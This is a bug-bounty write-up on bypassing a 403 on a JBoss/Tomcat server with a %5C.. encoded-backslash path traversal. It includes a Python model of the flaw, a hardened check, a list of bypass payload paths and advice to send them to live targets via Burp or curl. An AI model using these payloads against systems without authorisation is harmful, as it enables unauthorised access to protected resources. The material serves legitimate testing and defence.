There are times when things don't align all that well. Like finding some subdomain that returns 403, running all the wordlists against it and getting nothing, with the only interesting result being some random endpoint whose response size is 0. Sure, you ought to try a POST request against it because maybe there's something there, or mess around with headers and so on. But when that doesn't work, what then? Well, if the stars align a bit better, a response size of 0 still means there's nothing in the body of that page, but response headers like Server and X-Powered-By may lead to quite a lot: an exact product and version string is something you can search for.
On to the hack — Part 1
While it's very nifty to use various tools to determine what the target is running, there's nothing like manually checking out the target's responses to your requests. The best way to go about it has always been Burp. Be it the free or paid version, both offer the essential: being able to see the entire response, with all the headers that the target is configured to disclose. The same can be achieved in other ways (curl -i, or the browser's network tab), but Burp offers the most readable format, imho.
And so it happened that I found a random directory which ffuf marked as 200 OK and size 0, but because I wanted to mess around with headers as per my other articles:
So, I figured I'd access this boring-sounding directory through Burp and see if maybe I could achieve some SSRF or similar while messing with headers. And while that didn't result in anything, I did notice something interesting in the response headers.
On to the hack — Part 2
Here's the real old school approach. A simple Google search for jboss 4.0.3 tomcat-5.5 hackerone.com led to useful writeups. The one that worked on this had to do with adding %5C.. as a way to bypass any 401/403 protections. %5C is the URL-encoded backslash: the access check looks at the path as it was sent, while the container decodes it, treats the backslash as a path separator and collapses the .., so the two ends of the pipeline disagree about which resource is being requested.
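To make the mismatch concrete, here is an added, offline model of the bypass; it is example code written for this page, not code from the original post or from JBoss/Tomcat. It assumes a constructed protected prefix of /admin/ and a constructed public prefix of /public, models the container as "percent-decode, treat backslash as slash, collapse dot-dot", and pairs the vulnerable raw-path check with a hardened one that decides on the normalised path. The first candidate path is the article's %5C.. payload; the other three are commonly tried encodings of the same idea, included as a generalisation.

```python
"""
Offline model of the %5C.. (URL-encoded backslash + dot-dot) bypass.
Added example, not the original post's code. Every path and the protected
prefix below are constructed for the demonstration.
"""
from typing import Callable, List, Tuple
from urllib.parse import unquote

# Assumed protected area: a stand-in for whatever the real 401/403 path was.
PROTECTED_PREFIX = "/admin/"


def resolve_path(raw_path: str) -> str:
    """Model of a lenient container: percent-decode, treat '\\' like '/',
    then collapse '.' and '..' segments. Returns the path actually served."""
    decoded = unquote(raw_path).replace("\\", "/")
    segments: List[str] = []
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    if not segments:
        return "/"
    return "/" + "/".join(segments) + ("/" if decoded.endswith("/") else "")


def vulnerable_authorize(raw_path: str) -> bool:
    """Vulnerable check: decides on the literal path as sent, so
    '/public/%5C../admin/' does not look like '/admin/' to it."""
    return not raw_path.startswith(PROTECTED_PREFIX)


def hardened_authorize(raw_path: str) -> bool:
    """Fixed check: decide on the same normalised path the container will
    serve, and reject raw paths that still carry a backslash, a '..'
    segment or a second layer of percent-encoding after one decode."""
    decoded = unquote(raw_path)
    if "\\" in decoded or ".." in decoded.split("/") or "%" in decoded:
        return False
    return not resolve_path(raw_path).startswith(PROTECTED_PREFIX)


def handle_request(raw_path: str, authorize: Callable[[str], bool]) -> Tuple[int, str]:
    """Simulated pipeline: access check first, then resource resolution.
    Returns (status, served_path); served_path is empty on 403."""
    if not authorize(raw_path):
        return 403, ""
    return 200, resolve_path(raw_path)


def bypass_candidates(protected_path: str, public_prefix: str = "/public") -> List[str]:
    """Request paths to try against a 401/403 resource. The first is the
    article's %5C.. payload; the rest are commonly tried encodings of the
    same separator-plus-dot-dot idea (a generalisation, not from the post)."""
    target = protected_path.lstrip("/")
    return [
        f"{public_prefix}/%5C../{target}",     # encoded backslash, then ..
        f"{public_prefix}/%5c../{target}",     # lowercase hex digit
        f"{public_prefix}/..%5C{target}",      # .. then encoded backslash
        f"{public_prefix}/%2e%2e%5C{target}",  # dots encoded as well
    ]


if __name__ == "__main__":
    for path in [PROTECTED_PREFIX] + bypass_candidates(PROTECTED_PREFIX):
        print(f"{path:28} vulnerable={handle_request(path, vulnerable_authorize)} "
              f"hardened={handle_request(path, hardened_authorize)}")
```

Against a real target the same candidate list is what you would paste into Burp Repeater or feed to curl; the signal to look for is a 200 (with a body) on a candidate where the direct path gave 401 or 403.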
It just shows yet again the importance of manually testing even things that look as though there’s nothing to them.